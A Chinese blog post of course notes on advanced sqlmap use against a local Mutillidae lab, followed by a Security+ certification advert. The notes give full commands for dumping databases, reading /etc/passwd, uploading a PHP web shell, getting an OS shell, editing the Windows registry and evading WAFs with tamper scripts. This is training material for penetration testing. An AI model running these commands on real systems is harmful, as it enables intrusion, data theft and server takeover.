当前位置: 开发笔记 > 编程语言 > 正文

【安全牛学习笔记】SQLMAP自动注入

作者：妖精的尾巴的阿鲁哈 | 来源：互联网 | 2023-05-19 06:21

伪静态页面不能注入，这是错误的！SQLMAP自动注入08-----ENUMERATION--current-user--current-db--hostname--users--privi

伪静态页面不能注入，这是错误的！

SQLMAP自动注入08-----ENUMERATION

--current-user

--current-db

--hostname

--users

--privileges -U username (CU当前账号）

--roles

--dbs

--tables,--exclude-sysdbs -D dvwa

-T user -D dvwa -C user --columns

root@R:~# sqlmap -u "http://192.168.1.115/mutillidae/index.php?page=user-info.php&username=1&password=2&user-info-php-submit-button=View+Account+Details" -p "user-agent,username" --tamper="tamper/between.py,tamper/randomcase.py,tamper/space?comment.py" -v 3 --current-user

SQLMAP自动注入08-----ENUMERATION

--schema --batch --exclude-sysdbs 元数据（使用默认选项）

--count

Dump数据

--dump,-C,-T,-D,--start,--stop

--dump-all --exclude-sysdbs

--sql-query "select * from users"

SQLMAP自动注入09-----BRUTE FORCE

Mysql<5.0,没有information_schema库

Mysql>=5.0,但无权读取information_schema库

微软的access数据库，默认无权读取MSysObjects库

--common-tables

--common-columns (Access系统表无列信息)

root@R:~# sqlmap -u "http://192.168.1.115/mutillidae/index.php?page=user-info.php&username=1&password=2&user-info-php-submit-button=View+Account+Details" --common-tables

SQLMAP自动注入10-----UDF INJECTION

--udf-inject,--shared-lib

编译共享库创建并上传至DB Server,以此生成UDF实现高级注入

Linux: shared object

Windows: DLL

http://www.slideshare.net/inquis/advanced-sql-injection-to-operating-system-

full-control-whitepaper-4633857

SQLMAP自动注入11-----FILE SYSTEM

--file-read="/etc/passwd"

--file-write="shell.php" --file-dest"/tmp/shell.php"

root@R:~# cd /root/.sqlmap/output/192.168.1.115

root@R:/.sqlmap/output/192.168.1.115# ls

dump files log session.sqlite target.txt

root@R:/.sqlmap/output/192.168.1.115# cd files/

root@R:/.sqlmap/output/192.168.1.115/files# ls

_etc_passwd

root@R:/.sqlmap/output/192.168.1.115/files# cat _etc_passwd

root@R:~# vi shell.php

root@R:~# sqlmap -u "http://192.168.1.115/mutillidae/index.php?page=user-info.php&username=1&password=2&user-info-php-submit-button=View+Account+Details" -p "user-agent,username" --file-write="shell.php" --file-dest="/tmp/shell.php"

SQLMAP自动注入12-----OS

Mysql、postgresql

上传共享库并生成sys_exec()、sys_eval()两个UDF

Mssql

xp_cmdshell存储过程（有九用，禁了启，没有键）

--sql-shell

--os-shell

--os-cmd

root@R:~# sqlmap -u "http://192.168.1.115/mutillidae/index.php?page=user-info.php&username=1&password=2&user-info-php-submit-button=View+Account+Details" -p "user-agent,username" --os-cmd

root@R:~# sqlmap -u "http://192.168.1.115/mutillidae/index.php?page=user-info.php&username=1&password=2&user-info-php-submit-button=View+Account+Details" -p "user-agent,username" --os-shell

root@R:~# sqlmap -u "http://192.168.1.115/mutillidae/index.php?page=user-info.php&username=1&password=2&user-info-php-submit-button=View+Account+Details" -p "user-agent,username" --sql-shell

SQLMAP自动注入13-----WINDOWS REGISTORY

--reg-read

--reg-add

--reg-del

--reg-key、--reg-value、--reg-data、--reg-type

sqlmap.py -u="http://1.1.1.1/a.php?id=1 --reg-add\ --reg-key="HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap" --reg-value=Test --reg-type=REG-SZ --reg-data=1

SQLMAP自动注入14-----GENERAL

-s: sqlite会话文件保存位置

-t: 记录流浪文件保存位置

--charset: 强制字符编码

--charset=GBK

--crawl: 从起始位置爬站深度

--batch --crawl=3

--csv-del: dump数据默认存于","分割的CSV文件中，指定其他分隔符

--csv-del=";"

--dbms-cred: 指定数据库账号

SQLMAP自动注入14-----GENERAL

--flush-session: 清空session

--force-ssl

--fresh-queries: 忽略session查询结果

--hex: dump非ASCII字符内容时，将其编码为16进制形式，收到后解码还原

sqlmap -u "http://1.1.1.1/s.php?id=1" --hex -v 3

--output-dir=/tmp

--parse-error: 分析和现实数据库内建报错信息

sqlmap -u "http://1.1.1.1/sqlmap/a.php?id=1" --parse-errors

--save: 将命令保存成配置文件

SQLMAP自动注入15-----MISCELLANEOUS

-z: 参数助记符

sqlmap --batch --random-agent --ignore-proxy --technique=BEU -u

"1.1.1.1/a.php?id=1"

sqlmap -z "bat,randcma,ign,tec=BEU" -u "1.1.1.1/a.php?id=1"

sqlmap -ignore-proxy --flush-session --technique=U --dump -D testdb -

T user -u "1.1.1.1/a.php?id=1"

sqlmap -z "ign,flu,bat,tec=U,dump,D=testdb,T=users" -u

"1.1.1.1/vuln.php?id=1"

SQLMAP自动注入15-----MISCELLANEOUS

--answer

sqlmap -u "http://1.1.1.1/a.php?id=1" --technique=E --

answers="extending=N" --batch

--check-waf: 检测WAF/IPS/IDS

--hpp: HTTP parameter pollution

绕过WAF/IPS/IDS的有效方法

尤其对ASP/ISS 和 ASP.NET/IIS

--identify-waf: 彻底的waf/ips/ids检查

支持30多种产品

SQLMAP自动注入15-----MISCELLANEOUS

--mobile: 模拟智能手机设备

--purge-output: 清楚output文件夹

--smart: 当有大量检测目标时，只选择基于错误的检测结果

--wizard: 向导

该笔记为安全牛课堂学员笔记，想看此课程或者信息安全类干货可以移步到安全牛课堂

Security+认证为什么是互联网+时代最火爆的认证？

牛妹先给大家介绍一下Security+

Security+ 认证是一种中立第三方认证，其发证机构为美国计算机行业协会CompTIA ；是和CISSP、ITIL 等共同包含在内的国际 IT 业 10 大热门认证之一，和CISSP偏重信息安全管理相比，Security+ 认证更偏重信息安全技术和操作。

通过该认证证明了您具备网络安全，合规性和操作安全，威胁和漏洞，应用程序、数据和主机安全，访问控制和身份管理以及加密技术等方面的能力。因其考试难度不易，含金量较高，目前已被全球企业和安全专业人士所普遍采纳。

Security+认证如此火爆的原因？

原因一：在所有信息安全认证当中，偏重信息安全技术的认证是空白的， Security+认证正好可以弥补信息安全技术领域的空白。

目前行业内受认可的信息安全认证主要有CISP和CISSP，但是无论CISP还是CISSP都是偏重信息安全管理的，技术知识讲的宽泛且浅显，考试都是一带而过。而且CISSP要求持证人员的信息安全工作经验都要5年以上，CISP也要求大专学历4年以上工作经验，这些要求无疑把有能力且上进的年轻人的持证之路堵住。在现实社会中，无论是找工作还是升职加薪，或是投标时候报人员，认证都是必不可少的，这给年轻人带来了很多不公平。而Security+的出现可以扫清这些年轻人职业发展中的障碍，由于Security+偏重信息安全技术，所以对工作经验没有特别的要求。只要你有IT相关背景，追求进步就可以学习和考试。

原因二： IT运维人员工作与翻身的利器。

在银行、证券、保险、信息通讯等行业，IT运维人员非常多，IT运维涉及的工作面也非常广。是一个集网络、系统、安全、应用架构、存储为一体的综合性技术岗。虽然没有程序猿们“生当做光棍，死亦写代码”的悲壮，但也有着“锄禾日当午，不如运维苦“的感慨。天天对着电脑和机器，时间长了难免有对于职业发展的迷茫和困惑。Security+国际认证的出现可以让有追求的IT运维人员学习网络安全知识，掌握网络安全实践。职业发展朝着网络安全的方向发展，解决国内信息安全人才的匮乏问题。另外，即使不转型，要做好运维工作，学习安全知识取得安全认证也是必不可少的。

原因三：接地气、国际范儿、考试方便、费用适中！

CompTIA作为全球ICT领域最具影响力的全球领先机构,在信息安全人才认证方面是专业、公平、公正的。Security+认证偏重操作且和一线工程师的日常工作息息相关。适合银行、证券、保险、互联网公司等IT相关人员学习。作为国际认证在全球147个国家受到广泛的认可。

在目前的信息安全大潮之下，人才是信息安全发展的关键。而目前国内的信息安全人才是非常匮乏的，相信Security+认证一定会成为最火爆的信息安全认证。

本文出自 “11662938” 博客，请务必保留此出处http://11672938.blog.51cto.com/11662938/1969986

推荐阅读

stream
Java序列化对象传给PHP的方法及原理解析

本文介绍了Java序列化对象传给PHP的方法及原理，包括Java对象传递的方式、序列化的方式、PHP中的序列化用法介绍、Java是否能反序列化PHP的数据、Java序列化的原理以及解决Java序列化中的问题。同时还解释了序列化的概念和作用，以及代码执行序列化所需要的权限。最后指出，序列化会将对象实例的所有字段都进行序列化，使得数据能够被表示为实例的序列化数据，但只有能够解释该格式的代码才能够确定数据的内容。 ... [详细]

蜡笔小新 2023-12-14 15:25:15
ip
开发笔记：解决播放框架内容安全策略设置不起作用的问题

本文介绍了作者在开发过程中遇到的问题，即播放框架内容安全策略设置不起作用的错误。作者通过使用编译时依赖注入的方式解决了这个问题，并分享了解决方案。文章详细描述了问题的出现情况、错误输出内容以及解决方案的具体步骤。如果你也遇到了类似的问题，本文可能对你有一定的参考价值。 ... [详细]

蜡笔小新 2023-12-13 16:03:19
python
lua语言闭包、模式匹配、日期、编译、模块的特性及应用

本文介绍了lua语言中闭包的特性及其在模式匹配、日期处理、编译和模块化等方面的应用。lua中的闭包是严格遵循词法定界的第一类值，函数可以作为变量自由传递，也可以作为参数传递给其他函数。这些特性使得lua语言具有极大的灵活性，为程序开发带来了便利。 ... [详细]

蜡笔小新 2023-12-14 18:18:21
ip
Python高级之网络编程及TCP/IP协议簇的OSI七层模型介绍

本文介绍了Python高级网络编程及TCP/IP协议簇的OSI七层模型。首先简单介绍了七层模型的各层及其封装解封装过程。然后讨论了程序开发中涉及到的网络通信内容，主要包括TCP协议、UDP协议和IPV4协议。最后还介绍了socket编程、聊天socket实现、远程执行命令、上传文件、socketserver及其源码分析等相关内容。 ... [详细]

蜡笔小新 2023-12-14 18:16:27
ip
Android中高级面试必知必会，积累总结

本文介绍了Android中高级面试的必知必会内容，并总结了相关经验。文章指出，如今的Android市场对开发人员的要求更高，需要更专业的人才。同时，文章还给出了针对Android岗位的职责和要求，并提供了简历突出的建议。 ... [详细]

蜡笔小新 2023-12-14 14:53:02
python
Java String与StringBuffer的区别及其应用场景

本文主要介绍了Java中String和StringBuffer的区别，String是不可变的，而StringBuffer是可变的。StringBuffer在进行字符串处理时不生成新的对象，内存使用上要优于String类。因此，在需要频繁对字符串进行修改的情况下，使用StringBuffer更加适合。同时，文章还介绍了String和StringBuffer的应用场景。 ... [详细]

蜡笔小新 2023-12-13 19:21:06
ip
使用cacti监控mssql 2005运行资源情况的操作步骤

本文介绍了使用cacti监控mssql 2005运行资源情况的操作步骤，包括安装必要的工具和驱动，测试mssql的连接，配置监控脚本等。通过php连接mssql来获取SQL 2005性能计算器的值，实现对mssql的监控。详细的操作步骤和代码请参考附件。 ... [详细]

蜡笔小新 2023-12-12 13:57:58
python
向QTextEdit拖放文件的方法及实现步骤

本文介绍了在使用QTextEdit时如何实现拖放文件的功能，包括相关的方法和实现步骤。通过重写dragEnterEvent和dropEvent函数，并结合QMimeData和QUrl等类，可以轻松实现向QTextEdit拖放文件的功能。详细的代码实现和说明可以参考本文提供的示例代码。 ... [详细]

蜡笔小新 2023-12-14 16:06:38
ip
如何使用Java获取服务器硬件信息和磁盘负载率

本文介绍了使用Java编程语言获取服务器硬件信息和磁盘负载率的方法。首先在远程服务器上搭建一个支持服务端语言的HTTP服务，并获取服务器的磁盘信息，并将结果输出。然后在本地使用JS编写一个AJAX脚本，远程请求服务端的程序，得到结果并展示给用户。其中还介绍了如何提取硬盘序列号的方法。 ... [详细]

蜡笔小新 2023-12-14 13:56:20
case
switch语句的一些用法及注意事项

本文介绍了使用switch语句时的一些用法和注意事项，包括如何实现"fall through"、default语句的作用、在case语句中定义变量时可能出现的问题以及解决方法。同时也提到了C#严格控制switch分支不允许贯穿的规定。通过本文的介绍，读者可以更好地理解和使用switch语句。 ... [详细]

蜡笔小新 2023-12-13 14:47:39
case
UIAlertController被解散后如何立即执行代码块

有没有一种方法可以在不继承UIAlertController的子类或不涉及UIAlertActions的情况下 ... [详细]

蜡笔小新 2023-12-13 13:47:02
ip
如何在服务器主机上实现文件共享的方法和工具

本文介绍了在服务器主机上实现文件共享的方法和工具，包括Linux主机和Windows主机的文件传输方式，Web运维和FTP/SFTP客户端运维两种方式，以及使用WinSCP工具将文件上传至Linux云服务器的操作方法。此外，还介绍了在迁移过程中需要安装迁移Agent并输入目的端服务器所在华为云的AK/SK，以及主机迁移服务会收集的源端服务器信息。 ... [详细]

蜡笔小新 2023-12-13 13:23:48
input
南邮ctf-web的writeup

本文介绍了南邮ctf-web的writeup，包括签到题和md5 collision。在CTF比赛和渗透测试中，可以通过查看源代码、代码注释、页面隐藏元素、超链接和HTTP响应头部来寻找flag或提示信息。利用PHP弱类型，可以发现md5('QNKCDZO')='0e830400451993494058024219903391'和md5('240610708')='0e462097431906509019562988736854'。 ... [详细]

蜡笔小新 2023-12-13 10:58:55
input
Golang条件编译的必要性及实现方法

本文介绍了在多平台下进行条件编译的必要性，以及具体的实现方法。通过示例代码展示了如何使用条件编译来实现不同平台的功能。最后总结了只要接口相同，不同平台下的编译运行结果也会相同。 ... [详细]

蜡笔小新 2023-12-13 09:38:06
ip
MySQL显示SQL语句执行时间的实例详解

本文详细介绍了如何使用MySQL来显示SQL语句的执行时间，并通过MySQL Query Profiler获取CPU和内存使用量以及系统锁和表锁的时间。同时介绍了效能分析的三种方法：瓶颈分析、工作负载分析和基于比率的分析。 ... [详细]

蜡笔小新 2023-12-12 16:16:42

妖精的尾巴的阿鲁哈

这个家伙很懒，什么也没留下！

Tags | 热门标签

RankList | 热门文章